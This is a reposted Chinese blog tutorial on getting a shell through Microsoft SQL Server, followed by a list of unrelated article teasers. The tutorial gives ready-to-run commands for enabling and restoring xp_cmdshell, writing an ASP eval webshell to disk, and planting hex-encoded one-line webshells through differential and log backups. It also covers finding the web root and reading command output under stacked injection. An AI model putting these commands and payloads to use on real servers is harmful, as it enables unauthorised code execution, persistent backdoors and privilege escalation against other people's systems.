SQL Server从0到1——写shell

xp_cmdshell

查看能否使用xpcmd_shell;

select count(*) from master.dbo.sysobjects where xtype = 'x' and name =  'xp_cmdshell'

直接使用xpcmd_shell执行命令:

EXEC master.dbo.xp_cmdshell 'whoami'

 

发现居然无法使用

查看是否存在xp_cmdshell:

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

到现在我们知道了,这台mssql支持xp_cmdshell,但没有开启 xp_cmdshell:

启用:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

 

执行命令:

EXEC master.dbo.xp_cmdshell 'whoami'

 

可以看到这里已经有了system权限 主要找到web路径就可以使用cmd目录创建文件,获取web路径在后面有讲解

exec master..xp_cmdshell 'echo ^<%@ Page  Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> >  c:\\666.asp';

注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是写shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。。。。

差异备份

生成备份文件:

backup database test to disk = 'c:\bak.bak';--

创建表:

create table [dbo].[test] ([cmd] [image]);

插入一句话:

insert into test(cmd)  values(0x3C25657865637574652872657175657374282261222929253E)

再次备份:

backup database test to disk='C:\567.asp' WITH DIFFERENTIAL,FORMAT;--

 

就会生成一个asp一句话

LOG备份

1. alter database test set RECOVERY FULL2. create table cmd (a image)3. backup log test to disk = 'c:\test' with init4. insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)5. backup log test to disk = 'c:\test\2.asp'#LOG备份的要求是他的数据库备份过,而且选择恢复模式得是完整模式

 

路径获取

由于要写webshell,那么必须知道web的路径

1.通过报错获取网站路径

 

2.使用xp_dirtree获取目录信息:

execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录
execute master..xp_dirtree 'c:',1 //只列c:\文件夹
execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件#一个一个慢慢找

 

3.通过xpcmd_shell:

exec master..xp_cmdshell 'for /r c:\ %i in (i*.aspx) do @echo %i'

 

avatar

回显问题:看到这里,可能有很多小伙伴会不耐烦的说,这是我在软件上执行的sql命令,并非真实注入,该如何回显出信息 其实我们观察这些payload就可以发现,这些命令并非查询语句,并不能与普通的sql语句在一个语句中, 因此想要回显就必须满足,服务器支持堆叠注入

接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据

创建临时表:

CREATE TABLE tmpTable (tmp1 varchar(8000));

将数据存入表中:

insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig'

获取数据:

select * from tmpTable

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/603206.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LeetCode 每日一题 Day 36 ||模拟/字典序(哈希策略)

LeetCode 每日一题 Day 36 ||模拟/字典序(哈希策略)

383. 赎金信 给你两个字符串&#xff1a;ransomNote 和 magazine &#xff0c;判断 ransomNote 能不能由 magazine 里面的字符构成。 如果可以&#xff0c;返回 true &#xff1b;否则返回 false 。 magazine 中的每个字符只能在 ransomNote 中使用一次。 示例 1&#xff1…
阅读更多...
PyQT5+MySQL的学生信息管理系统【附源码,运行简单】

PyQT5+MySQL的学生信息管理系统【附源码,运行简单】

PyQT5MySQL的学生信息管理系统【附源码&#xff0c;运行简单】 总览 1、《学生成绩管理系统》1.1 方案设计说明书设计目标需求分析工具列表 2、详细设计2.1 登录2.2 程序主页面2.3 学生新增界面2.4 学生更改界面2.4 学生删除界面2.5 其他功能贴图 3、下载 总览 自己做的项目&a…
阅读更多...
C语言 设置控制台字体及背景颜色

C语言 设置控制台字体及背景颜色

颜色函数SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),前景色 | 背景色 | 前景加强 | 背景加强); 前景色&#xff1a;数字0-15 或 FOREGROUND_XXX 表示 &#xff08;其中XXX可用BLUE、RED、GREEN表示&#xff09; 前景加强&#xff1a;数字8 或 FOREGROUND_INTENS…
阅读更多...
使用Docker-Compose部署MySQL一主二从同步高可用MHA集群

使用Docker-Compose部署MySQL一主二从同步高可用MHA集群

文章目录 &#x1f50a;博主介绍&#x1f964;本文内容准备mysql一主二从同步集群一主二从同步集群规划需要安装docker和docker-compose命令形式安装安装docker安装docker-compose 宝塔面板形式安装 部署Master节点的docker-compose.yaml文件部署MySQL从节点1的docker-compose.…
阅读更多...
QOS(Quality of Service)基本原理及配置示例

QOS(Quality of Service)基本原理及配置示例

个人认为&#xff0c;理解报文就理解了协议。通过报文中的字段可以理解协议在交互过程中相关传递的信息&#xff0c;更加便于理解协议。 由于QOS&#xff08;Quality of Service&#xff09;在报文上主要是更改特定字段进行流量的差异化服务&#xff0c;因此此处重点介绍各种服…
阅读更多...
使用 C# Winfrom编写倒计时功能

使用 C# Winfrom编写倒计时功能

在日常生活中&#xff0c;我们经常需要倒计时来提醒自己重要的时间节点&#xff0c;比如倒计时到达一个特定的日期和时间。介绍一个使用 C# 编写的倒计时应用程序的实现。 步骤一&#xff1a;应用程序的功能 它具有以下几个主要特点&#xff1a; 用户输入目标日期和时间&…
阅读更多...
从零实现CLIP模型

从零实现CLIP模型

1. 引言 CLIP代表语言图像对比预训练模型&#xff0c;是OpenAI于2021年开发的一个深度学习模型。CLIP模型中图像和文本嵌入共享相同的潜在特征空间&#xff0c;从而能够在两种模式之间直接进行对比学习。这是通过训练模型使相关的图像和文本更紧密地结合在一起&#xff0c;同时…
阅读更多...
浅谈 JVM 类加载过程

浅谈 JVM 类加载过程

&#x1f697;&#x1f697;&#x1f697;今天给大家分享的是HTTPS加密的工作过程。 清风的CSDN博客 &#x1f6e9;️&#x1f6e9;️&#x1f6e9;️希望我的文章能对你有所帮助&#xff0c;有不足的地方还请各位看官多多指教&#xff0c;大家一起学习交流&#xff01; ✈️✈…
阅读更多...
四. 基于环视Camera的BEV感知算法-BEVDistill

四. 基于环视Camera的BEV感知算法-BEVDistill

目录 前言0. 简述1. 算法动机&开创性思路2. 主体结构3. 损失函数4. 性能对比总结下载链接参考 前言 自动驾驶之心推出的《国内首个BVE感知全栈系列学习教程》&#xff0c;链接。记录下个人学习笔记&#xff0c;仅供自己参考 本次课程我们来学习下课程第四章——基于环视Cam…
阅读更多...
Transformer架构和对照代码详解

Transformer架构和对照代码详解

1、英文架构图 下面图中展示了Transformer的英文架构&#xff0c;英文架构中的模块名称和具体代码一一对应&#xff0c;方便大家对照代码、理解和使用。 2、编码器 2.1 编码器介绍 从宏观⻆度来看&#xff0c;Transformer的编码器是由多个相同的层叠加⽽ 成的&#xff0c;每个…
阅读更多...
Auto tokenizer和Bert tokenizer的区别

Auto tokenizer和Bert tokenizer的区别

"AutoTokenizer" 和 "BERT Tokenizer" 是两个不同概念&#xff0c;而不是两种不同的tokenizer。让我为您解释它们的含义&#xff1a; AutoTokenizer: "AutoTokenizer" 不是一个具体的tokenizer&#xff0c;而是 Hugging Face Transformers 库中提…
阅读更多...
10款有趣的前端源码分享(附效果图及在线演示)

10款有趣的前端源码分享(附效果图及在线演示)

分享10款非常有趣的前端特效源码 其中包含css动画特效、js原生特效、svg特效以及小游戏等 下面我会给出特效样式图或演示效果图 但你也可以点击在线预览查看源码的最终展示效果及下载源码资源 自毁按钮动画特效 自毁按钮动画特效 点击打开盒子可以点击自毁按钮 进而会出现自毁…
阅读更多...
【网络层】网际控制报文协议ICMP(湖科大慕课自学笔记)

【网络层】网际控制报文协议ICMP(湖科大慕课自学笔记)

网际控制报文协议ICMP 1&#xff1a;网际控制报文协议ICMP基本概述 ICMP报文被封装在IP数据报中发送 1&#xff1a;ICMP报文格式 ICMP报文作为IP数据报的数据载荷&#xff0c;IP协议为其添加一个首部使之成为IP数据报 2&#xff1a;ICMP报文类型 ICMP报文分为两大类&#x…
阅读更多...
NGUI基础-三大基础组件之Event System(Uicameras)

NGUI基础-三大基础组件之Event System(Uicameras)

目录 主要作用 相关参数 (建议&#xff1a;红色是重点&#xff0c;黑色的了解即可&#xff09; Event Type Events go to Process Events in Event Mask​编辑 Debug Command Click Allow Multi Touch Auto Hide Cursor Sticky ToolTip/Long press ToolTip/ToolTip…
阅读更多...
vue实现点击复制功能方法封装demo。

vue实现点击复制功能方法封装demo。

源码如下 copyTextToClipboard(text, that) { const textArea document.createElement("textarea"); textArea.value text; document.body.appendChild(textArea); 在子节点末尾添加元素 textArea.select(); select方法讲解可以了解一下 JavaScri…
阅读更多...
工业协议转换网关:打破通信壁垒,实现设备互联

工业协议转换网关:打破通信壁垒,实现设备互联

在工业自动化领域&#xff0c;各种设备和系统间的通信协议不尽相同&#xff0c;这给不同设备间的集成和数据交互带来了挑战。工业协议转换网关作为一种解决这一问题的关键设备&#xff0c;能够实现不同协议间的转换和数据传输&#xff0c;打破通信壁垒&#xff0c;提高设备的协…
阅读更多...
【PostgreSQL】模式Schema

【PostgreSQL】模式Schema

PostgreSQL 数据库集群包含一个或多个命名数据库。角色和一些其他对象类型在整个集群中共享。与服务器的客户端连接只能访问单个数据库中的数据&#xff0c;该数据库在连接请求中指定。 数据库包含一个或多个命名schema&#xff0c;而这些schema又包含表。schema还包含其他类型…
阅读更多...
Java 基础知识点1 (含面试题)

Java 基础知识点1 (含面试题)

本次Java 知识点主要是关于SE的相关基础&#xff0c;同时也包含了数据结构中的一些API&#xff0c;例如Set,List,Map等&#xff0c;最后也附上了相关重要的面试题&#xff0c;可供大家学习与参考&#xff01; 目录 重要知识点数据结构API面试题 重要知识点 Java 是一门面向对象…
阅读更多...
税法相关的基础知识

税法相关的基础知识

文章目录 税法原则1.税法基本原则2.税法适用原则3.税收收入划分 来和大家聊聊税法相关的基础知识 税法原则 1.税法基本原则 2.税法适用原则 3.税收收入划分
阅读更多...
Flume基础知识(十):Flume 聚合实战

Flume基础知识(十):Flume 聚合实战

1&#xff09;案例需求&#xff1a; hadoop100上的 Flume-1 监控文件/opt/module/group.log&#xff0c; hadoop101上的 Flume-2 监控某一个端口的数据流&#xff0c; Flume-1 与 Flume-2 将数据发送给 hadoop102 上的 Flume-3&#xff0c;Flume-3 将最终数据打印 到控制台。…
阅读更多...
最新文章

Copyright @ 2022~2023